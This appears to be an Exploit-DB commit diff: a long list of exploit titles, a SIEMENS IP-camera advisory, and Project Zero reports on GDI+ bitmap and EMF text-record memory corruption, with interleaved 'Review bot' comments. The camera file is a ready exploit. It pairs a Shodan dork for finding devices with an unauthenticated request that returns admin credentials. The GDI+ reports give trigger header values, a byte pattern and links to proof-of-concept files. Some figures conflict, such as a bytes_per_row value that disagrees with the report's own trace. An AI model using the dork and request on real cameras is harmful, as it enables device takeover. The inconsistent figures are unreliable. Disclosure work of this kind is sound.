Helm 3.2.10 beta - default.asp Multiple Parameter XSS CutePHP CuteNews 1.4.1 Editnews Module Cross-Site Scripting CutePHP CuteNews 1.4.1 Editnews Module - Cross-Site Scripting RadScripts RadLance 7.0 Popup.php Local File Inclusion RadScripts RadLance 7.0 - Popup.php Local File Inclusion dotWidget for articles 2.0 showcatpicks.php file_path Parameter Remote File Inclusion dotWidget for articles 2.0 showarticle.php file_path Parameter Remote File Inclusion dotWidget for articles 2.0 admin/authors.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 admin/articles.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 admin/index.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 admin/categories.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 - showcatpicks.php file_path Parameter Remote File Inclusion dotWidget for articles 2.0 - showarticle.php file_path Parameter Remote File Inclusion dotWidget for articles 2.0 - admin/authors.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 - admin/articles.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 - admin/index.php Multiple Parameter Remote File Inclusion dotWidget for articles 2.0 - admin/categories.php Multiple Parameter Remote File Inclusion CrisoftRicette 1.0 Cookbook.php Remote File Inclusion CrisoftRicette 1.0 - Cookbook.php Remote File Inclusion MF Piadas 1.0 Admin.php Remote File Inclusion MF Piadas 1.0 - Admin.php Remote File Inclusion ExtCalendar 2.0 ExtCalendar.php Remote File Inclusion ExtCalendar 2.0 - ExtCalendar.php Remote File Inclusion Calendar Module 1.5.7 For Mambo Com_Calendar.php Remote File Inclusion Calendar Module 1.5.7 For Mambo - Com_Calendar.php Remote File Inclusion Lussumo Vanilla 1.0 RootDirectory Remote File Inclusion Lussumo Vanilla 1.0 - RootDirectory Remote File Inclusion Bosdates 3.x/4.0 Payment.php Remote File Inclusion Bosdates 3.x/4.0 - Payment.php Remote File 
Inclusion Liga Manager Online 2.0 Joomla! Component Remote File Inclusion Liga Manager Online 2.0 Joomla! Component - Remote File Inclusion Knusperleicht FAQ 1.0 Script Index.php Remote File Inclusion Knusperleicht FAQ 1.0 Script - Index.php Remote File Inclusion MyWebland miniBloggie 1.0 Fname Remote File Inclusion MyWebland miniBloggie 1.0 - Fname Remote File Inclusion PHP-Nuke 2.0 AutoHTML Module Local File Inclusion PHP-Nuke 2.0 AutoHTML Module - Local File Inclusion Reporter 1.0 Mambo Component Reporter.sql.php Remote File Inclusion Reporter 1.0 Mambo Component - Reporter.sql.php Remote File Inclusion Mambo Rssxt Component 1.0 MosConfig_absolute_path Multiple Remote File Inclusion Mambo Rssxt Component 1.0 - MosConfig_absolute_path Multiple Remote File Inclusion Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Inclusion Headline Portal Engine 0.x/1.0 - HPEInc Parameter Multiple Remote File Inclusion Mambo/Joomla Com_comprofiler 1.0 Plugin.class.php Remote File Inclusion Mambo/Joomla Com_comprofiler 1.0 Plugin.- class.php Remote File Inclusion PHP-Proxima 6.0 BB_Smilies.php Local File Inclusion PHP-Proxima 6.0 - BB_Smilies.php Local File Inclusion Hitweb 3.0 REP_CLASS Multiple Remote File Inclusion Hitweb 3.0 - REP_CLASS Multiple Remote File Inclusion php_news 2.0 user_user.php language Parameter Remote File Inclusion php_news 2.0 admin/news.php language Parameter Remote File Inclusion php_news 2.0 admin/catagory.php language Parameter Remote File Inclusion php_news 2.0 creat_news_all.php language Parameter Remote File Inclusion php_news 2.0 - user_user.php language Parameter Remote File Inclusion php_news 2.0 - admin/news.php language Parameter Remote File Inclusion php_news 2.0 - admin/catagory.php language Parameter Remote File Inclusion php_news 2.0 - creat_news_all.php language Parameter Remote File Inclusion CommunityPortals 1.0 Bug.php Remote File Inclusion CommunityPortals 1.0 - Bug.php Remote File Inclusion PHPTreeView 1.0 
TreeViewClass.php Remote File Inclusion PHPTreeView 1.0 - TreeViewClass.php Remote File Inclusion NewP News Publishing System 1.0 Class.Database.php Remote File Inclusion NewP News Publishing System 1.0 - Class.Database.php Remote File Inclusion Boonex 2.0 Dolphin Index.php Remote File Inclusion Boonex 2.0 Dolphin - Index.php Remote File Inclusion Apple Mac OS X 10.4.8 UDIF Disk Image Remote Denial of Service Apple Mac OS X 10.4.8 -UDIF Disk Image Remote Denial of Service Apple Mac OS X 10.4.8 UDTO Disk Image Remote Denial of Service Apple Mac OS X 10.4.8 - UDTO Disk Image Remote Denial of Service eCardMAX HotEditor 4.0 Keyboard.php Local File Inclusion eCardMAX HotEditor 4.0 - Keyboard.php Local File Inclusion Comus 2.0 Accept.php Remote File Inclusion Comus 2.0 - Accept.php Remote File Inclusion Active PHP Bookmarks 1.0 APB.php Remote File Inclusion Active PHP Bookmarks 1.0 - APB.php Remote File Inclusion ABC Excel Parser Pro 4.0 Parser_Path Remote File Inclusion ABC Excel Parser Pro 4.0 - Parser_Path Remote File Inclusion PHP-Nuke 8.0 autohtml.php Local File Inclusion PHP-Nuke 8.0 - autohtml.php Local File Inclusion Drupal Ajax Checklist 5.x-1.0 Module Multiple SQL Injection Drupal Ajax Checklist 5.x-1.0 Module - Multiple SQL Injection EagleGet 1.1.8.1 - Denial of Service Exploit EagleGet 1.1.8.1 - Denial of Service Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module SQL Injection Asterisk 'asterisk-addons' 1.2.7/1.4.3 CDR_ADDON_MYSQL Module - SQL Injection Jeebles Technology Jeebles Directory 2.9.60 Download.php Local File Inclusion Jeebles Technology Jeebles Directory 2.9.60 - Download.php Local File Inclusion CodeWidgets Web Based Alpha Tabbed Address Book Index.ASP SQL Injection Phpbasic basicFramework 1.0 Includes.php Remote File Inclusion CodeWidgets Web Based Alpha Tabbed Address Book - Index.ASP SQL Injection Phpbasic basicFramework 1.0 - Includes.php Remote File Inclusion Download Management 1.00 for PHP-Fusion Multiple Local File Inclusion 
Download Management 1.00 for PHP-Fusion - Multiple Local File Inclusion PlutoStatus Locator 1.0pre alpha 'index.php' Local File Inclusion PlutoStatus Locator 1.0pre alpha - 'index.php' Local File Inclusion Microsoft Internet Explorer 7/8 Beta 1 Frame Location Cross Domain Security Bypass Microsoft Internet Explorer 7/8 Beta 1 - Frame Location Cross Domain Security Bypass miniBB RSS 2.0 Plugin Multiple Remote File Inclusion miniBB RSS 2.0 Plugin - Multiple Remote File Inclusion phpKF-Portal 1.10 baslik.php tema_dizin Parameter Traversal Local File Inclusion phpKF-Portal 1.10 anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion phpKF-Portal 1.10 - baslik.php tema_dizin Parameter Traversal Local File Inclusion phpKF-Portal 1.10 - anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion Couchdb 1.5.0 - uuids DoS Exploit Couchdb 1.5.0 - uuids Denial of Service CuteNews 1.4.6 editnews Module doeditnews Action Admin Moderation Bypass CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass ZTE and TP-Link RomPager - DoS Exploit ZTE and TP-Link RomPager - Denial of Service C99Shell 1.0 pre-release buil 'Ch99.php' Cross-Site Scripting C99Shell 1.0 pre-release build 16 - 'Ch99.php' Cross-Site Scripting Percha Gallery Component 1.6 Beta for Joomla! index.php controller Parameter Traversal Arbitrary File Access Percha Gallery Component 1.6 Beta for Joomla! - index.php controller Parameter Traversal Arbitrary File Access log1 CMS 2.0 Session Handling Remote Security Bypass and Remote File Inclusion log1 CMS 2.0 - Session Handling Remote Security Bypass / Remote File Inclusion Miniwork Studio Canteen 1.0 Component for Joomla! SQL Injection and Local File Inclusion Miniwork Studio Canteen 1.0 Component for Joomla! 
- SQL Injection / Local File Inclusion CMS Made Simple Download Manager 1.4.1 Module Arbitrary File Upload CMS Made Simple Download Manager 1.4.1 Module - Arbitrary File Upload CMS Made Simple Antz Toolkit 1.02 Module Arbitrary File Upload CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload TWiki 5.0 bin/view rev Parameter XSS TWiki 5.0 - bin/view rev Parameter XSS slickMsg 0.7-alpha 'top.php' Cross-Site Scripting slickMsg 0.7-alpha - 'top.php' Cross-Site Scripting Drupal CAPTCHA Module Security Bypass Drupal CAPTCHA Module - Security Bypass WordPress 4.0 - Denial of Service Exploit WordPress 4.0 - Denial of Service Cradlepoint MBR1400 and MBR1200 Local File Inclusion Cradlepoint MBR1400 and MBR1200 - Local File Inclusion mIRC 'projects.php' Cross-Site Scripting mIRC - 'projects.php' Cross-Site Scripting Apache 'mod_wsgi' Module Information Disclosure Apache 'mod_wsgi' Module - Information Disclosure Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040) Microsoft Windows 7 (x64) - afd.sys Privilege Escalation (MS14-040) SIEMENS IP-Camera CVMS2025-IR_ CCMS2025 - Credentials Disclosure Microsoft GDI+ - DecodeCompressedRLEBitmap Invalid Pointer Arithmetic Out-of-Bounds Write (MS16-097) Microsoft GDI+ - ValidateBitmapInfo Invalid Pointer Arithmetic Out-of-Bounds Reads (MS16-097) Microsoft GDI+ - EMR_EXTTEXTOUTA and EMR_POLYTEXTOUTA Heap-Based Buffer Overflow (MS16-097)
parent edb6b2e39f
commit 5be2377b41
5 changed files with 1164 additions and 792 deletions
60
platforms/cgi/webapps/40254.txt
Executable file
|
@ -0,0 +1,60 @@
|
|||
1. Advisory Information
|
||||
========================================
|
||||
Title : SIEMENS IP-Camera Unauthenticated Remote Credentials Disclosure
|
||||
Vendor Homepage : https://www.siemens.com
|
||||
Remotely Exploitable : Yes
|
||||
Versions Affected : x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235
|
||||
Tested on Camera types : CVMS2025-IR, CCMS2025 (Camera type)
|
||||
Reference for CCMS2025 : https://w5.siemens.com/web/cz/cz/corporate/portal/home/produkty_a_sluzby/IBT/pozarni_a_bezpecnostni_systemy/cctv/ip_kamery/Documents/023_CCIS1425_A6V10333969_en.doc.pdf
|
||||
Vulnerability : Username / Password Disclosure (Critical/High)
|
||||
Shodan Dork : title:"SIEMENS IP-Camera"
|
||||
Date : 16/08/2016
|
||||
Author : Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
|
||||
|
||||
2. CREDIT
|
||||
========================================
|
||||
This vulnerability was identified during penetration test by Yakir Wizman.
|
||||
|
||||
|
||||
3. Description
|
||||
========================================
|
||||
SIEMENS IP-Camera (CVMS2025-IR + CCMS2025) allows to unauthenticated user disclose the username & password remotely by simple request which made by browser.
|
||||
|
||||
|
||||
4. Proof-of-Concept:
|
||||
========================================
|
||||
Simply go to the following url:
|
||||
http://host:port/cgi-bin/readfile.cgi?query=ADMINID
|
||||
|
||||
Should return some javascript variable which contain the credentials and other configuration vars:
|
||||
var Adm_ID="admin"; var Adm_Pass1=“admin”; var Adm_Pass2=“admin”; var Language=“en”; var Logoff_Time="0";
|
||||
|
||||
|
||||
Request:
|
||||
----------
|
||||
GET /cgi-bin/readfile.cgi?query=ADMINID HTTP/1.1
|
||||
Host: host:port
|
||||
Connection: close
|
||||
|
||||
|
||||
Response:
|
||||
----------
|
||||
HTTP/1.0 200 OK
|
||||
Connection: close
|
||||
Content-type: text/html
|
||||
|
||||
var Adm_ID="admin";
|
||||
var Adm_Pass1=“admin”;
|
||||
var Adm_Pass2=“admin”;
|
||||
var Language=“en”;
|
||||
var Logoff_Time="0";
|
||||
|
||||
|
||||
|
||||
Login @ http://host:port/cgi-bin/chklogin.cgi
|
||||
|
||||
|
||||
5. SOLUTION
|
||||
========================================
|
||||
Contact the vendor for further information regarding the proper mitigation of this vulnerability.
|
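Review bot: The sample response in section 4 quotes Adm_Pass1, Adm_Pass2 and Language with typographic quotes (“admin”, “en”) while Adm_ID and Logoff_Time use straight quotes, both in the one-line summary and in the Response block. As written this is not valid JavaScript and is unlikely to be the device's literal output, so anyone deriving a detection signature from this file would match on the wrong characters; please restore the straight quotes from the original capture. Smaller points: "Versions Affected" lists x.2.2.1798 twice, and a plain-text advisory does not need to be committed as an executable file. Section 5 gives defenders nothing to act on; a line recommending that /cgi-bin/readfile.cgi not be reachable from untrusted networks until the vendor provides a fix would make the entry more useful.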
102
platforms/windows/dos/40255.txt
Executable file
|
@ -0,0 +1,102 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=824
|
||||
|
||||
The GDI+ library can handle bitmaps originating from untrusted sources through a variety of attack vectors, like EMF files, which may embed bitmaps in records such as EMR_PLGBLT, EMR_BITBLT, EMR_STRETCHBLT, EMR_STRETCHDIBITS etc. The GDI+ implementation supports bitmaps compressed with the BI_RLE8 (8-bit Run-Length Encoding) compression algorithm, and performs the actual decompression in the gdiplus!DecodeCompressedRLEBitmap function.
|
||||
|
||||
In a simplified scheme of things, let's introduce the following symbols, as they are calculated by GDI+ (all arithmetic is performed on signed 32-bit types):
|
||||
|
||||
columns = abs(biHeight)
|
||||
bytes_per_row = abs(biWidth * (((biPlanes * biBitCount + 31) & 0xFFFFFFE0) / 8))
|
||||
|
||||
The output buffer used to store the decompressed bitmap is allocated from the heap and has a size of columns * bytes_per_row, which means the bitmap has a high degree of control over the buffer's length. One of the supported RLE escape codes is "End of Line", implemented as follows:
|
||||
|
||||
--- cut ---
|
||||
out_ptr += bytes_per_row;
|
||||
if (out_ptr > output_buffer_end) {
|
||||
// Bail out.
|
||||
}
|
||||
--- cut ---
|
||||
|
||||
The above construct seems correct at a first glance, and indeed works fine on 64-bit platforms. However, in 32-bit Large Address Aware programs which can utilize the full 32-bit address space, the "out_ptr += bytes_per_row" expression may overflow the upper address space bound (0xFFFFFFFF), which will subsequently make the "out_ptr" pointer contain a completely invalid address, while still passing the "out_ptr > output_buffer_end" sanity check.
|
||||
|
||||
Here's an example:
|
||||
|
||||
biWidth = 0x05900000
|
||||
biHeight = 0x00000017
|
||||
biPlanes = 0x0001
|
||||
biBitCount = 0x0008
|
||||
|
||||
As a result, columns = 0x17, bytes_per_row = 0x590000 and the output buffer size is 0x7ff00000. In my test application, the buffer is allocated at address 0x7fff0020, and it ends at 0xffef0020. If we then encode the bitmap as:
|
||||
|
||||
End of Line \
|
||||
End of Line |
|
||||
End of Line | 24 times
|
||||
... |
|
||||
End of Line /
|
||||
Repeat the 0xcc bytes 255 times.
|
||||
|
||||
Or in binary:
|
||||
|
||||
000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFCC
|
||||
|
||||
Then the out_ptr pointer will change as follows:
|
||||
|
||||
7fff0020
|
||||
858f0020
|
||||
8b1f0020
|
||||
...
|
||||
ffef0020
|
||||
057f0020
|
||||
|
||||
As you can see, the address has passed the sanity checks at all stages, and now that it is out of the allocation's bounds, an attempt to write any data will result in a crash:
|
||||
|
||||
--- cut ---
|
||||
(3434.194): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=0011015e ebx=ffef0020 ecx=000000fe edx=057f01cc esi=057f0020 edi=0011a6f0
|
||||
eip=6b090e5a esp=0037f290 ebp=0037f2ac iopl=0 nv up ei pl nz na pe cy
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010207
|
||||
gdiplus!DecodeCompressedRLEBitmap+0x195:
|
||||
6b090e5a 8816 mov byte ptr [esi],dl ds:002b:057f0020=??
|
||||
0:000> ? dl
|
||||
Evaluate expression: 204 = 000000cc
|
||||
0:000> kb
|
||||
ChildEBP RetAddr Args to Child
|
||||
0037f2ac 6b091124 057f0020 cc11012c 0037f2cc gdiplus!DecodeCompressedRLEBitmap+0x195
|
||||
0037f6f4 6b092c7a 001100f8 0011012c 00000000 gdiplus!CopyOnWriteBitmap::CopyOnWriteBitmap+0x96
|
||||
0037f708 6b0932cc 001100f8 0011012c 00000000 gdiplus!CopyOnWriteBitmap::Create+0x23
|
||||
0037f720 6b0c1e8b 001100f8 0011012c 00000000 gdiplus!GpBitmap::GpBitmap+0x32
|
||||
0037f804 6b0c7ed1 0000004f 00143a30 0000a67c gdiplus!CEmfPlusEnumState::PlgBlt+0x92
|
||||
0037f818 6b0986ca 0000004f 0000a67c 00110074 gdiplus!CEmfPlusEnumState::ProcessRecord+0xe7
|
||||
0037f834 6b098862 0000004f 00000000 0000a67c gdiplus!GdipPlayMetafileRecordCallback+0x6c
|
||||
0037f85c 773955ec 472127aa 0047d798 00110074 gdiplus!EnumEmfDownLevel+0x6e
|
||||
0037f8e8 6b09aa36 472127aa 403581b3 6b0987f4 GDI32!bInternalPlayEMF+0x6a3
|
||||
0037f920 6b09d199 472127aa 54461fd1 0137f98c gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
|
||||
0037f9c8 6b09f455 00000000 54461fd1 0037faf0 gdiplus!GpGraphics::EnumEmf+0x391
|
||||
0037fb28 6b0a4742 00000000 42901225 42901d0b gdiplus!GpMetafile::EnumerateForPlayback+0x7b9
|
||||
0037fc24 6b0a47c6 00143228 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
|
||||
0037fc88 6b09c792 00143228 0037fcfc 0037fcfc gdiplus!GpGraphics::DrawImage+0x51
|
||||
0037fcc0 6b09ea7a 00143228 0037fcfc 00000005 gdiplus!GpGraphics::DrawMetafileSplit+0x1f
|
||||
0037fd14 6b09f4d5 00142f10 0037fda0 00000000 gdiplus!GpMetafile::ConvertToEmfPlus+0x1c1
|
||||
0037fd38 6b074f71 00142f10 0037fda0 00000005 gdiplus!GpMetafile::ConvertToEmfPlus+0x1d
|
||||
0037fd74 0118117e 00142f10 00143228 0037fda0 gdiplus!GdipConvertToEmfPlus+0xbf
|
||||
...
|
||||
--- cut ---
|
||||
|
||||
The issue has been reproduced with a C++ program built with Microsoft Visual Studio 2013 for the x86 platform and with the /LARGEADDRESSAWARE flag set, which boils down to the following code:
|
||||
|
||||
--- cut ---
|
||||
Graphics graphics(hdc);
|
||||
Metafile *mf = new Metafile(L"C:\\path\\to\\poc.emf");
|
||||
|
||||
INT conversionSuccess;
|
||||
mf->ConvertToEmfPlus(&graphics, &conversionSuccess, Gdiplus::EmfTypeEmfPlusDual, NULL);
|
||||
--- cut ---
|
||||
|
||||
The poc.emf file is attached. The reproducibility of the crash using the specific testcase is obviously highly dependent on the state of the process address space while loading the image, so poc.emf might not necessarily lead to a crash of a GDI+ client other than the test program (such as Microsoft Office).
|
||||
|
||||
The above analysis was performed using the gdiplus.dll file found in C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll on a fully patched Windows 7 64-bit operating system (md5sum c861ee277cd4e2d914740000161956ef).
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40255.zip
|
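Review bot: The worked example in 40255.txt does not add up as written: "bytes_per_row = 0x590000" disagrees with the out_ptr trace, which advances by 0x05900000 per End of Line (7fff0020 to 858f0020), and with the stated buffer size, since 0x17 * 0x05900000 = 0x7ff00000. The formula given earlier, biWidth * (((biPlanes * biBitCount + 31) & 0xFFFFFFE0) / 8), would yield 0x05900000 * 4 for these header values, so it is best read as the "simplified scheme" the text announces and not as the exact computation. If the file is meant to mirror the upstream report verbatim, keep the text and add a short archive note with the corrected figure. The label "Or in binary" likewise introduces a hex string (a run of 00 00 End of Line escapes followed by FF CC). For readers using this entry as a reference for the fix, it would help to state that the wrap is avoided by comparing bytes_per_row against the remaining space (output_buffer_end - out_ptr) before advancing the pointer, instead of advancing first and comparing pointers afterwards.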
84
platforms/windows/dos/40256.txt
Executable file
|
@ -0,0 +1,84 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=826
|
||||
|
||||
|
||||
The GDI+ library can handle bitmaps originating from untrusted sources through a variety of attack vectors, like EMF files, which may embed bitmaps in records such as EMR_PLGBLT, EMR_BITBLT, EMR_STRETCHBLT, EMR_STRETCHDIBITS etc.
|
||||
|
||||
In a simplified scheme of things, let's introduce the following symbols, as they are calculated by GDI+ (all arithmetic is performed on signed 32-bit types):
|
||||
|
||||
columns = abs(biHeight)
|
||||
bytes_per_row_signed = biWidth * (((biPlanes * biBitCount + 31) & 0xFFFFFFE0) / 8)
|
||||
|
||||
While the gdiplus!ValidateBitmapInfo attempts to validate the correctness of the bitmap headers to some degree, it also fills out portions of a structure which is later used to display the bitmap or perform any other operations on the image. One of them is a pointer to the first row of pixels, calculated depending on the signedness of the biHeight field, which indicates if the bitmap is encoded upside-down or not. This is illustrated by the following pseudo-code snippet:
|
||||
|
||||
--- cut ---
|
||||
if (biHeight > 0) {
|
||||
first_row = &pixels_buffer[bytes_per_row_signed * (biHeight - 1)];
|
||||
} else {
|
||||
first_row = pixels_buffer;
|
||||
}
|
||||
--- cut ---
|
||||
|
||||
Even though there are some dependencies between the various fields that must be met, the attacker still has almost full control over the values of both bytes_per_row_signed and biHeight. If the bytes_per_row_signed variable holds a negative value and biHeight is larger than 1, then we can get the first_row pointer to point at a nearly arbitrary location relative to the address of pixels_buffer.
|
||||
|
||||
The exploitation of this bug is additionally facilitated by a flaw in the gdiplus!GetBitmapFromRecord function, which is supposed to check that the EMF record is sufficiently large to fully contain the bitmap data, and is called at the beginning of the BMP-related EMF record handlers, before any BMP parsing actually takes place. The most interesting expression is as follows:
|
||||
|
||||
--- cut ---
|
||||
if (record_length - bitmap_data_offset >= GetDibBitsSize(&header)) {
|
||||
return TRUE;
|
||||
}
|
||||
return FALSE;
|
||||
--- cut ---
|
||||
|
||||
The above check appears to be effective at a first glance, but it turns out that the GetDibBitsSize() function returns 0 if there are any problems detected in the headers, including invalid values in specific fields (biWidth, biHeight, ...), integer overflows etc. As a result, contrary to intuition, a malformed header will cause the above check to automatically pass, opening up the potential for bugs such as the one discussed in this report further in the bitmap handling code.
|
||||
|
||||
A poc.emf file is attached. It has been confirmed to crash both x86 and x64 builds of a test EMF viewer written in C++, and Microsoft Office 2013. It uses an EMR_PLGBLT record with a malformed, embedded bitmap and the following fields:
|
||||
|
||||
biWidth = 0x30000000
|
||||
biHeight = 0x00000002
|
||||
biPlanes = 0x0001
|
||||
biBitCount = 0x0008
|
||||
|
||||
The above combination of values will lead to GetDibBitsSize() returning 0, bytes_per_row_signed holding a negative value, and the first_row pointer addressing an invalid address lower than the actual buffer:
|
||||
|
||||
--- cut ---
|
||||
(4144.1e30): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=f046faf4 ebx=0000fdec ecx=00003e72 edx=00000000 esi=f046012c edi=07c7d624
|
||||
eip=75969b60 esp=0034ec88 ebp=0034ec90 iopl=0 nv up ei pl nz ac pe nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210216
|
||||
msvcrt!memcpy+0x5a:
|
||||
75969b60 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
|
||||
0:000> kb
|
||||
ChildEBP RetAddr Args to Child
|
||||
0034ec90 6b0a5bd3 07c7d624 f046012c 0000f9c8 msvcrt!memcpy+0x5a
|
||||
0034ecb0 6b09780d 07c7d1e0 f046012c 20000000 gdiplus!EmfPlusCommentStream::Write+0x9e
|
||||
0034f584 6b098180 07c7d1e0 00000002 08be4cd8 gdiplus!CopyOnWriteBitmap::GetData+0x3f3
|
||||
0034f59c 6b0a6029 07c7d1e0 00000002 08be4cd8 gdiplus!GpBitmap::GetData+0x1c
|
||||
0034f5b4 6b0a8a55 00000005 08be4cd8 00000000 gdiplus!MetafileRecorder::WriteObject+0x49
|
||||
0034f5d8 6b0a7814 07c7badc 0034f730 07c90d28 gdiplus!MetafileRecorder::RecordObject+0x57
|
||||
0034f720 6b0a453d 0034f7f8 08be4cd8 00000000 gdiplus!MetafileRecorder::RecordDrawImage+0x93
|
||||
0034f818 6b0a4838 08be4cd8 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x1f0
|
||||
0034f87c 6b0c205d 08be4cd8 0034f918 00000003 gdiplus!GpGraphics::DrawImage+0x66
|
||||
0034f96c 6b0c7ed1 0000004f 07c94cb0 0000a67c gdiplus!CEmfPlusEnumState::PlgBlt+0x264
|
||||
0034f980 6b0986ca 0000004f 0000a67c 00460074 gdiplus!CEmfPlusEnumState::ProcessRecord+0xe7
|
||||
0034f99c 6b098862 0000004f 00000000 0000a67c gdiplus!GdipPlayMetafileRecordCallback+0x6c
|
||||
0034f9c4 773955ec 7021208b 05d56ff8 00460074 gdiplus!EnumEmfDownLevel+0x6e
|
||||
0034fa50 6b09aa36 7021208b 403581b3 6b0987f4 GDI32!bInternalPlayEMF+0x6a3
|
||||
0034fa88 6b09d199 7021208b 5e461f1b 0134faf4 gdiplus!MetafilePlayer::EnumerateEmfRecords+0x104
|
||||
0034fb30 6b09f455 00000000 5e461f1b 0034fc58 gdiplus!GpGraphics::EnumEmf+0x391
|
||||
0034fc90 6b0a4742 00000000 42901225 42901d0b gdiplus!GpMetafile::EnumerateForPlayback+0x7b9
|
||||
0034fd8c 6b0a47c6 07c75f28 00000000 00000000 gdiplus!GpGraphics::DrawImage+0x3f5
|
||||
0034fdf0 6b09c792 07c75f28 0034fe64 0034fe64 gdiplus!GpGraphics::DrawImage+0x51
|
||||
0034fe28 6b09ea7a 07c75f28 0034fe64 00000005 gdiplus!GpGraphics::DrawMetafileSplit+0x1f
|
||||
0034fe7c 6b09f4d5 07c71d28 0034ff08 00000000 gdiplus!GpMetafile::ConvertToEmfPlus+0x1c1
|
||||
0034fea0 6b074f71 07c71d28 0034ff08 00000005 gdiplus!GpMetafile::ConvertToEmfPlus+0x1d
|
||||
0034fedc 010c117e 07c71d28 07c75f28 0034ff08 gdiplus!GdipConvertToEmfPlus+0xbf
|
||||
...
|
||||
--- cut ---
|
||||
|
||||
The above analysis was performed using the gdiplus.dll file found in C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.23407_none_5c02a2f5a011f9be\GdiPlus.dll on a fully patched Windows 7 64-bit operating system (md5sum c861ee277cd4e2d914740000161956ef).
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40256.zip
|
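Review bot: The GetBitmapFromRecord snippet is documented only as failing open, and 40256.txt never states the condition a corrected check needs. Since the text says GetDibBitsSize() returns 0 on any header problem, "record_length - bitmap_data_offset >= GetDibBitsSize(&header)" passes for every malformed header; one line noting that a 0 return has to be rejected before the length comparison would make the root cause explicit. The same applies to the first_row pseudo-code: say that the product bytes_per_row_signed * (biHeight - 1) needs to be checked to land inside pixels_buffer before first_row is formed. Separately, the md5sum given is for gdiplus.dll, while the linked 40256.zip has no checksum recorded, so consider adding one so the archive can be verified after download.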
122
platforms/windows/dos/40257.txt
Executable file
|
@ -0,0 +1,122 @@
|
|||
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=828
|
||||
|
||||
The Microsoft GDI+ implementation of the EMF format supports records corresponding to the ExtTextOutA() and PolyTextOutA() API functions. Both CEmfPlusEnumState::ExtTextOutA and CEmfPlusEnumState::PolyTextOutA handlers suffer from a security vulnerability in the handling of the "offDx" record field, which is described in the following way in the format specification:
|
||||
|
||||
--- cut ---
|
||||
offDx (4 bytes): A 32-bit unsigned integer that specifies the offset to an intercharacter spacing
|
||||
array, in bytes, from the start of the record in which this object is contained. This value MUST be
|
||||
32-bit aligned.
|
||||
--- cut ---
|
||||
|
||||
The offset is supposed to address an array of "Chars" (another field in the text records, specifying the number of characters to be displayed) double words, taking up a total of 4 * N bytes. However, instead of verifying that the provided record is sufficiently large to contain 4 * N bytes at the specified offset, it only checks if it can fit 4 bytes (completely ignoring the actual number of characters in the message, which can be larger than 1). A pseudo-code of the current, vulnerable code is shown below:
|
||||
|
||||
--- cut ---
|
||||
if ( record_size - offString >= nChars && (!nChars || record_size - 4 >= record->emrtext.offDx) ) {
|
||||
// Validation passed, continue processing the record.
|
||||
}
|
||||
--- cut ---
|
||||
|
||||
There is definitely a flaw in the implementation, but one which would typically only lead to an out-of-bound read condition, since it's a problem with the sanitization of an input buffer. However, the logic found in the remainder of the function is as follows:
|
||||
|
||||
- Attempt to convert the textual ANSI string in the record to a wide-char string, using the MultiByteToWideChar() function and the code page specified in the most recently selected font.
|
||||
- If the number of characters converted is equal to the number of bytes in the input buffer, CEmfPlusEnumState::PlayExtTextOut() is called and the function returns.
|
||||
- Otherwise, the function proceeds to rewrite the offDx buffer by calling EmfEnumState::CreateCopyOfCurrentRecord() to allocate an exact copy of the current record (with the same size), and then copying entries of the intercharacter spacing array, omitting those corresponding to bytes which cause the IsDBCSLeadByteEx() function to return true. Once the rewriting is performed, CEmfPlusEnumState::PlayExtTextOut() is called with the new record as the parameter.
|
||||
|
||||
In order to trigger the more interesting array rewriting behavior, we must get the MultiByteToWideChar() function to convert fewer characters than there are bytes in the input buffer, which means we have to utilize a string in a non-standard encoding, which supports double-byte character sets (DBCS). Luckily, this is possible by selecting a font with an appropriate charset (e.g. SHIFTJIS_CHARSET) into the HDC, and invoking either of the *TextOutA() handlers with a byte stream containing so-called lead bytes (which folds two bytes into a single character, decreasing the eventual return value of the MultiByteToWideChar() call).
|
||||
|
||||
Since the spacing array in the new record is too small to store entries for all "Chars" characters, it is overflown with data read from memory after the original record buffer. Considering the complexity of the EMF format, other records in the picture file could be easily used to massage the heap such that the record copy is overflown with fully controlled data. The issue has been reproduced in Microsoft Office 2013, as well as a simple C++ program which boils down to the following calls:
|
||||
|
||||
--- cut ---
|
||||
Graphics graphics(hdc);
|
||||
Metafile *mf = new Metafile(L"C:\\path\\to\\poc.emf");
|
||||
|
||||
INT conversionSuccess;
|
||||
mf->ConvertToEmfPlus(&graphics, &conversionSuccess, Gdiplus::EmfTypeEmfPlusDual, NULL);
|
